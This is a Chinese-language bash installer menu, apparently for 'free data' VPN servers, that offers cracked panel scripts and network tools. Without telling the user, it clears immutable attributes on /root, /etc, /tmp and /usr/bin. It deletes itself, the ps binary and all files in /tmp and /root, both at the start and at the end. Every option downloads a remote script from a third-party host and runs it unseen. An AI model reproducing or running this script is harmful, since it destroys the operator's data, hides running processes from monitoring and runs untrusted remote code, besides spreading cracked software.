#!/bin/bash
ulimit -c 0 >/dev/null 2>&1
chattr -i /root >/dev/null 2>&1
chattr -i /tmp >/dev/null 2>&1
chattr -i /etc >/dev/null 2>&1
chattr -i /usr/bin >/dev/null 2>&1
rm -rf $0 >/dev/null 2>&1
rm -rf xbcpj >/dev/null 2>&1
rm -f /tmp/* >/dev/null 2>&1
rm -f /root/* >/dev/null 2>&1
rm -f /usr/bin/ps >/dev/null 2>&1
# ********************************** 脚本开始 **************************** #
IP=`wget http://www.sbwml.cn/getip -O - -q ; echo`;
# LOGO ********************************************************************
# 广告通知 ****************************************************************
echo
echo "正在检测您的IP是否正确加载..."

	if [[ "$IP" == '' ]]; then
		echo '无法检测您的IP,可能会影响到您接下来的搭建工作';
		read -p '请输入您的公网IP:' IP;
		[[ "$IP" == '' ]] && InputIPAddress;
	fi;
	[[ "$IP" == '' ]] && 
						 echo -e 'IP状态：			  [\033[32m  OK  \033[0m]'
						 echo -e "您的IP是：\033[34m$IP \033[0m"
						 echo 
						 echo
	if [ mod=1 ]
	then
echo -e "\033[33m========================================================================= \033[0m"
echo -e "\033[36m                     不知年少轻狂、只知胜者为王 \033[0m"
echo ""
echo -e "\033[36m                       官网网站：xbml.vip \033[0m"
echo ""
echo -e "\033[36m                       小白QQ：1475129762 \033[0m"
echo ""
echo -e "\033[36m                       免流交流群:173504018\033[0m"
echo ""
echo -e "\033[1;5;31m        欢迎使用小白综合脚本：\n\033[0;1;36m"
echo -e
echo -e
echo -e "\033[0;1;35m                  1.青云破解脚本               【7.x系统】  6-14更新    \033[0m"                
echo -e "\033[0;1;35m                  2.天天破解脚本               【7.x系统】  5-20更新    \033[0m" 
echo -e "\033[0;1;35m                  3.传说破解脚本               【7.x系统】              \033[0m"
echo -e "\033[0;1;35m                  4.草根破解脚本               【7.x系统】  5-20更新    \033[0m"  
echo -e "\033[0;1;35m                  5.小洋人破解脚本             【7.x系统】  6-30更新    \033[0m"  
echo -e "\033[0;1;35m                  6.康师傅破解脚本             【7.x系统】              \033[0m"  
echo -e "\033[0;1;35m                  7.骚逼汪破解脚本             【7.x系统】  5-20更新    \033[0m" 
echo -e "\033[0;1;35m                  8.HTML2.1破解脚本            【7.x系统】  4-20更新    \033[0m" 
echo -e "\033[0;1;35m                  9.快云3期破解脚本            【7.x系统】  5-23更新    \033[0m" 

#echo
echo -e "\033[0;1;36m        小工具搭建脚本:                                    \033[0m"
echo
echo -e "\033[0;1;31m                  20.一键开任意端口共存版      \033[0m"
echo -e "\033[0;1;31m                  21.修复云免没网脚本          \033[0m" 
echo -e "\033[0;1;31m                  22.一键锐速加速脚本    6.X          \033[0m"
echo -e "\033[0;1;31m                  23.最新一键锐速加速 所有系统          \033[0m"
echo    
echo   -e "\033[0;1;32m             如有脚本不能搭建 欢迎反馈         \033[0m"                                                                                                                      
echo -e "\033[36m                                                by 小白免流       \033[0m"
echo -e "\033[33m========================================================================== \033[0m"
echo
echo
echo -n "输入您要搭建的选项: " 
read mode
fi
if [[ $mode == "1" ]]     
then
echo -e "安装类型：\033[36m青云破解脚本\033[0m" ;  
wget http://xbmlpj.nos-eastchina1.126.net/qy  >/dev/null 2>&1
bash qy
fi


if [[ $mode == "2" ]] 
then
echo -e "安装类型：\033[36m天天破解脚本\033[0m" ; 
wget http://xbmlpj.nos-eastchina1.126.net/tt  >/dev/null 2>&1
bash tt
fi


if [[ $mode == "3" ]] 
then
echo -e "安装类型：\033[36m传说破解脚本\033[0m" ; 
wget http://xbmlpj.nos-eastchina1.126.net/cs >/dev/null 2>&1
bash cs
fi

if [[ $mode == "4" ]] 
then
echo -e "安装类型：\033[36m草根破解脚本\033[0m" ; 
wget  http://xbmlpj.nos-eastchina1.126.net/cg >/dev/null 2>&1
bash cg
fi

if [[ $mode == "5" ]] 
then
echo -e "安装类型：\033[36m小洋人破解脚本\033破解脚本\033[0m" ; 
wget  http://xbmlpj.nos-eastchina1.126.net/xyr  >/dev/null 2>&1
bash xyr
fi

if [[ $mode == "6" ]] 
then
echo -e "安装类型：\033[36m康师傅破解脚本\033[0m" ; 
wget  http://xbmlpj.nos-eastchina1.126.net/kang.sh  >/dev/null 2>&1
bash kang.sh
fi

if [[ $mode == "7" ]] 
then
echo -e "安装类型：\033[36m骚逼汪破解脚本\033[0m" ; 
wget http://xbmlpj.nos-eastchina1.126.net/sbw >/dev/null 2>&1
bash sbw
fi

if [[ $mode == "8" ]] 
then
echo -e "安装类型：\033[36mHTML2.1破解脚本\033[0m" ; 
wget http://xbmlpj.nos-eastchina1.126.net/html2.1 >/dev/null 2>&1
bash html2.1
fi

if [[ $mode == "9" ]] 
then
echo -e "安装类型：\033[36m快云3期破解脚本\033[0m" ; 
wget http://xbmlpj.nos-eastchina1.126.net/ky >/dev/null 2>&1
bash ky
fi


if [[ $mode == "20" ]] 
then
echo -e "安装类型：\033[36m一键开任意端口共存版\033[0m" ; 
wget  http://xbml.vip/kdk   >/dev/null 2>&1
bash kdk
fi


if [[ $mode == "21" ]] 
then
echo -e "安装类型：\033[36m修复云免没网脚本\033[0m" ; 
wget  http://xbml.vip/xiu  >/dev/null 2>&1
bash xiu
fi


if [[ $mode == "22" ]]     
then
echo -e "安装类型：\033[36m一键锐速加速脚本\033[0m" ;  
wget http://xbmlpj.nos-eastchina1.126.net/sr.sh >/dev/null 2>&1
bash sr.sh
fi

if [[ $mode == "23" ]] 
then
echo -e "安装类型：\033[36m最新一键锐速加速、后面两个都输入1\033[0m" ; 
wget -N --no-check-certificate https://raw.githubusercontent.com/91yun/serverspeeder/master/serverspeeder-all.sh && bash serverspeeder-all.sh
fi

rm -f /tmp/* >/dev/null 2>&1
rm -f /root/* >/dev/null 2>&1

exit 0